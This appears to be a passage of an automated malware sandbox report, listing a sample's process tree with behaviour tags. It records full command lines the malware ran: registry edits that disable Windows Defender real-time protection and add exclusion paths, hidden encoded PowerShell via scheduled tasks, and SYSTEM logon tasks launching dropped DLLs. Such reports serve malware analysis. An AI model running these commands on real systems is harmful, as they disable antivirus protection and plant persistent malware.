      4⤵
      Suspicious use of WriteProcessMemory
      PID:2924
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2932
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    - Suspicious use of WriteProcessMemory
    PID:2248
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2772
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:2744
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    - Suspicious use of WriteProcessMemory
    PID:2264
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2624
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2116
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    - Indirect Command Execution
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2464
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2832
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2736
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:2740
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gHUBoNDAD" /SC once /ST 01:05:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:284
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gHUBoNDAD"
  2⤵
  PID:2088
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gHUBoNDAD"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1144
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
  2⤵
  PID:1492
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:696
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
  2⤵
  PID:2600
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2196
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gHAUHtKfr" /SC once /ST 03:55:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID:2112
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gHAUHtKfr"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2164
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gHAUHtKfr"
  2⤵
  PID:1592
- C:\Windows\SysWOW64\forfiles.exe
  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
  2⤵
  - Indirect Command Execution
  - System Location Discovery: System Language Discovery
  PID:1560
- - C:\Windows\SysWOW64\cmd.exe
    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2448
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1964
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1064
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TEEaErdYmgJnvnOu" /t REG_DWORD /d 0 /reg:32
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2064
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TEEaErdYmgJnvnOu" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:1368
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TEEaErdYmgJnvnOu" /t REG_DWORD /d 0 /reg:64
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1816
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TEEaErdYmgJnvnOu" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:2704
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TEEaErdYmgJnvnOu" /t REG_DWORD /d 0 /reg:32
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2348
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TEEaErdYmgJnvnOu" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1508
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TEEaErdYmgJnvnOu" /t REG_DWORD /d 0 /reg:64
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2104
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TEEaErdYmgJnvnOu" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1828
- C:\Windows\SysWOW64\cmd.exe
  cmd /C copy nul "C:\Windows\Temp\TEEaErdYmgJnvnOu\hAtwvDBr\qPNMoUgCcqNCxCRM.wsf"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2068
- C:\Windows\SysWOW64\wscript.exe
  wscript "C:\Windows\Temp\TEEaErdYmgJnvnOu\hAtwvDBr\qPNMoUgCcqNCxCRM.wsf"
  2⤵
  PID:2032
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YRaAzzcUU" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:1612
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YRaAzzcUU" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:2308
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZYpYvUfwMKUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:2776
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZYpYvUfwMKUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:2216
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bcDGOSnszpTU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:2116
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bcDGOSnszpTU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:2436
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nadwbZkmFdleQDJCsLR" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:2812
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nadwbZkmFdleQDJCsLR" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:2736
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uulhOemmgIOXC" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:2180
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uulhOemmgIOXC" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    PID:3032
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\HHFPPRMXrrQnklVB" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:284
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\HHFPPRMXrrQnklVB" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:380
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:3044
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:596
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\cChxpbaSEZypPfLfq" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:1704
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\cChxpbaSEZypPfLfq" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:2884
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TEEaErdYmgJnvnOu" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:3052
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TEEaErdYmgJnvnOu" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    PID:2228
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YRaAzzcUU" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2368
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YRaAzzcUU" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3040
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZYpYvUfwMKUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2508
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZYpYvUfwMKUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1664
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bcDGOSnszpTU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1136
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bcDGOSnszpTU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2256
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nadwbZkmFdleQDJCsLR" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2152
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nadwbZkmFdleQDJCsLR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2208
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uulhOemmgIOXC" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2140
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uulhOemmgIOXC" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:328
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\HHFPPRMXrrQnklVB" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\HHFPPRMXrrQnklVB" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2312
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2828
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:748
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\cChxpbaSEZypPfLfq" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2708
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\cChxpbaSEZypPfLfq" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1400
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TEEaErdYmgJnvnOu" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1436
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TEEaErdYmgJnvnOu" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1104
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gAzcfEDOU" /SC once /ST 00:48:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:348
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gAzcfEDOU"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1776
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gAzcfEDOU"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1604
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2892
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
    3⤵
    PID:2556
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
  2⤵
  PID:2876
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2724
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "DwGWbITCxFlrfOcyQ"
  2⤵
  PID:2908
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "DwGWbITCxFlrfOcyQ"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2836
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "DwGWbITCxFlrfOcyQ2"
  2⤵
  PID:2264
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "DwGWbITCxFlrfOcyQ2"
  2⤵
  PID:2668
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "KZmDJfLQyasmMYLCR"
  2⤵
  PID:2728
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "KZmDJfLQyasmMYLCR"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1928
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "KZmDJfLQyasmMYLCR2"
  2⤵
  PID:2736
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "KZmDJfLQyasmMYLCR2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2972
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "gtoVOqmBPJSfuwTxkKz"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2960
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gtoVOqmBPJSfuwTxkKz"
  2⤵
  PID:2088
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "gtoVOqmBPJSfuwTxkKz2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3036
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gtoVOqmBPJSfuwTxkKz2"
  2⤵
  PID:1880
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "KhAZksiYHkbAYZvhNlA"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2860
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "KhAZksiYHkbAYZvhNlA"
  2⤵
  PID:2344
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "KhAZksiYHkbAYZvhNlA2"
  2⤵
  PID:540
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "KhAZksiYHkbAYZvhNlA2"
  2⤵
  PID:2408
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\YRaAzzcUU\MdxyKd.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "OwQWslRjOgHVMZf" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
  PID:3052
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "gNWsRwQPfugSCbF"
  2⤵
  PID:3060
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gNWsRwQPfugSCbF"
  2⤵
  PID:2896
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "gNWsRwQPfugSCbF2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3008
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gNWsRwQPfugSCbF2"
  2⤵
  PID:2212
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "MyBabwhBLSDOhD"
  2⤵
  PID:1492
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "MyBabwhBLSDOhD"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:496
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "ponygaWrgotAq"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2196
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "ponygaWrgotAq"
  2⤵
  PID:2256
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "ponygaWrgotAq2"
  2⤵
  PID:1048
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "ponygaWrgotAq2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1152
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "OwQWslRjOgHVMZf2" /F /xml "C:\Program Files (x86)\YRaAzzcUU\gzNYcDf.xml" /RU "SYSTEM"
  2⤵
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID:2976
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "OwQWslRjOgHVMZf"
  2⤵
  PID:540
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "OwQWslRjOgHVMZf"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2408
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "MwAwyZfakrhXVJ" /F /xml "C:\Program Files (x86)\bcDGOSnszpTU2\kmLRzko.xml" /RU "SYSTEM"
  2⤵
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID:3052
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "UpVguSTkAZKwI2" /F /xml "C:\ProgramData\HHFPPRMXrrQnklVB\czLcqAK.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2840
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "KZmDJfLQyasmMYLCR2" /F /xml "C:\Program Files (x86)\nadwbZkmFdleQDJCsLR\topQvcg.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3008
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "KhAZksiYHkbAYZvhNlA2" /F /xml "C:\Program Files (x86)\uulhOemmgIOXC\AdUBiDe.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2512
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 244
  2⤵
  - Program crash
  PID:2208

C:\Windows\system32\taskeng.exe
